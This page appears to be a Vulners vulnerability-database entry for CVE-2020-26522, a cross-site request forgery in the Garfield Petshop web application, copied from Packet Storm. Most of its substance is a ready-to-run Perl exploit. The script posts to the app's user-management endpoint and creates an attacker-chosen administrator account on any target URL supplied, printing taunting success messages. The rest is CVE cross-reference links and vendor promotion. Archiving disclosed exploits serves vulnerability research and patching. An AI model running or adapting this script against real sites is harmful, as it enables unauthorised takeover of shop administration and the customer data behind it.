Lucene search
K

Garfield Petshop 2020-10-01 Cross Site Request Forgery

🗓️ 09 Oct 2020 00:00:00Reported by Ramdan YantuType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 617 Views

Garfield Petshop Add-Admin Exploit CVE-2020-2652

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2020-26522
9 Oct 202006:44
cve
Cvelist
CVE-2020-26522
9 Oct 202006:44
cvelist
EUVD
EUVD-2020-19068
7 Oct 202500:30
euvd
NVD
CVE-2020-26522
9 Oct 202007:15
nvd
OSV
CVE-2020-26522
9 Oct 202007:15
osv
Prion
Cross site request forgery (csrf)
9 Oct 202007:15
prion
Positive Technologies
PT-2020-16436 · Unknown · Garfield Petshop
9 Oct 202000:00
ptsecurity
RedhatCVE
CVE-2020-26522
22 May 202516:34
redhatcve
`#!/usr/bin/perl  
  
# Garfield Petshop (Add-Admin) Exploit  
# By Ramdan Yantu rysec.io \ bastardlabs.info  
# From Gorontalo - Indonesia  
# Mail: ramdanyantu__at__gmail.com  
# Application by Gamma Advertisa  
# Link: https://detapos.co/ | https://demo.detapos.co.id/petshop  
# CVE: CVE-2020-26522  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
  
my ($url, $path, $usernm, $passwd) = @ARGV ;  
  
unless($ARGV[3]){  
print "\n-+--[ Brought to you by Ramdan Yantu ]--+-\n";  
print "-+-- rysec.io / bastardlabs.info --+-\n";  
print "-+--[ Garfield Petshop Add-Admin Exploit ]--+-\n";  
print "\nUsage:\n\n";  
print "perl $0 [target] [path] [username] [password]\n";  
print "ex: perl $0 http://target.com /petshop/ w00t w00t\n";  
exit ();  
}  
  
my $ua = LWP::UserAgent->new( agent => "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1)" );  
my $ob = $ua->post( $url.$path."/mod/user/act_user.php?mod=user&act=simpan", {   
"nama_lengkap" => "u h4V3 833n 0wN3D", "usernm" => $usernm,  
"passwd" => $passwd, "rpasswd" => $passwd, "level" => "admin" } );  
if($ob->is_success != -1) {  
print "\n [+] splo!it successfully!\n".  
"\n username: $usernm\n".  
" password: $passwd\n";  
  
}else{  
print "[-] splo!t failed! Maybe ente kurang tamvan!\n";  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation